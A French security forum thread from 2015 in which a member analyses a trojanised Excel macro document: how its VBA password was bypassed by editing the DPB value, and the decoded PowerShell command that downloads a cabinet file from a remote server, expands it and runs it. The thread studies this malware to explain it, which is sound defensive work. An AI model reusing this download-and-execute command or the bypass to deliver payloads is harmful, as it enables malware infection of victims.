Documents XLS malveillants : macros-commandes VBA+PowerShell

Avatar de l’utilisateur
ѠOOT
Geek à longue barbe
Geek à longue barbe
Messages : 1043
Inscription : 28 déc. 2011 20:39

Documents XLS malveillants : macros-commandes VBA+PowerShell

Message par ѠOOT » 24 févr. 2015 19:34

Bonjour,

Je me suis intéressé au document "IM1637_863.xls" détecté comme étant Trojan.MSExcel.Agent.e, créé depuis Microsoft Excel à 18:10:45 et modifié à 18:10:48, le 19 janvier 2015.

Par défaut, Microsoft Excel empêche l'exécution des macros.
Image

La victime se doit d'abaisser le niveau de sécurité en autorisant l'exécution de macros inconnues.
Stupide me direz-vous ? Et pourtant, à la surprise générale, ça fonctionne encore !

L'année 2015 commence avec une ↗ significative des infections par documents piégés avec macros.

Image
( graphique est extrait du rapport "TrendLabs 1Q 2015 Security Roundup" )

En novembre 2014, j'écrivais sur la campagne de pourriels ciblant le Royaume-Uni qui comportaient des documents Word piégés. Début 2015, Microsoft s'est empressé de communiquer sur le sujet en fournissant des conseils et des détails sur les méthodes d'ingénieries sociales employées sur les documents Word & Excel.

La consultation est autorisée, seule l'exécution est bloquée donc, l'esprit rassuré, les habitués à ces fichiers ont pris le réflexe d'aller inspecter le contenu des macros. Mais voilà, dans le cas qui nous intéresse l'accès au code est protégé par un mot de passe. Le but recherché n'est pas de ralentir l'analyse car les moteurs antivirus n'ont pas besoins de connaitre ce genre de détails et ce n'est pas non plus pour ralentir l'expert car celui-ci maitrise les manipulations de flux de documents OLE. Finalement, c'est lié aux principaux intéressés : de quoi susciter un doute et titiller la conscience des employés assignés aux travaux de secrétariat : "c'est peut-être un document important..." se disent-ils. Dilemme, dois-je autoriser pour vérifier ?

Pour visualiser le VBA, je remplace le mot de passe inconnu de la protection de l'affichage du projet. ( un classique, lire Rovnix infects systems with password-protected macros ) Pour se faire, j'édite le fichier à l'aide d'un éditeur hexadécimal puis je recherche et remplace la valeur de DPB.

DPB="AEAC020F0E31784E784E87B2794E863353E281979D8B37C6A87A1192FEDE92E279A16963A89D07"

Par un mot de passe de notre choix, que l'on connait.

DPB="4644EAD32ED54CF24CF2B30E4DF2676D8AAC3C472BAB27AC5830395FAF05FF1129A318DA79433F"

J'enregistre sous une copie. À la demande du mot de passe, je saisi le mot de passe "chenapan".

Dans le code, je remplace la commande "Shell" qui normalement exécute par une commande inoffensive permettant d'écrire dans la fenêtre d'affichage du débogueur ( vidéo ).

Voici le code affiché:

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://...','%TEMP%\JIOiodfhioIH.cab');
expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe;
start %TEMP%\JIOiodfhioIH.exe;


L'interpréteur de commandes "cmd.exe" va rester actif et exécuter la commande "PowerShell.exe" avec ses arguments. La commandelette "New-Object" de Windows PowerShell est utilisée pour créer et utiliser la méthode WebClient.DownloadFile pour récupérer un fichier sur le serveur distant : 176.31.28.235. L'utilitaire de décompression de fichiers compressés "expand.exe" va extraire le contenu du fichier téléchargé au format cabinet à l'emplacement des fichiers temporaires de Windows. La commande "start" va, comme son nom l'indique, exécuter le programme.

J'ignore si le cocktail ( Microsoft Excel + Microsoft Visual Basic for Applications + Microsoft PowerShell ) sera efficace mais chose certaine c'est que lorsque les "badguys" utiliseront pleinement la puissance et les capacités de WMI ⑴ ou PowerShell ⑵ ce sera surement une toute autre paire de manche.


edit: Ajouts de liens hypertextes vers nouvelles publications.

➱ ( 16 Feb 2015 ) ❴ Banking malware VAWTRAK now uses malicious macros, abuses Windows PowerShell
➱ ( 20 Apr 2015 ) ❴ Without a Trace : Fileless Malware Spotted in the Wild
➱ ( 24 Mar 2015 ) ❴Macro-based malware increases along with spam volume, now drops BARTALEX
➱ ( 27 Apr 2015 ) ❴Enterprises hit by BARTALEX macro malware in recent spam outbreak
➱ ( 28 Apr 2015 ) ❴ Social engineering tricks open the door to macro-malware attacks
➱ ( 4 May 2015 ) ❴ Macro Malware: When Old Tricks Still Work, Part 1
➱ ( 7 May 2015 ) ❴ Macro Malware: When Old Tricks Still Work, Part 2


Abusing Windows Management Instrumentation WMI to build a persistent asynchronous & fileless backdoor

CARO 2015 - The Tao of .NET & Powershell Malware Analysis ( Roberto Martinez // @r0bertmart1nez )


backlinks: Rançongiciels chiffreurs entièrement écrits en Windows PowerShell
Dernière édition par ѠOOT le 21 mai 2015 11:31, édité 8 fois.
‮Vous aimez la sécurité informatique ? Dopez vos neurones, achetez MISCMAG !
...nuf rof tsuJ

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 86183
Inscription : 10 sept. 2005 13:57
Contact :

Re: Documents XLS malveillants : macros-commandes VBA+PowerS

Message par Malekal_morte » 25 févr. 2015 18:18

Super PDT_001 PDT_008

Merci.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Répondre

Revenir vers « Tech, Tips & Tricks »

Qui est en ligne ?

Utilisateurs parcourant ce forum : Aucun utilisateur inscrit et 1 invité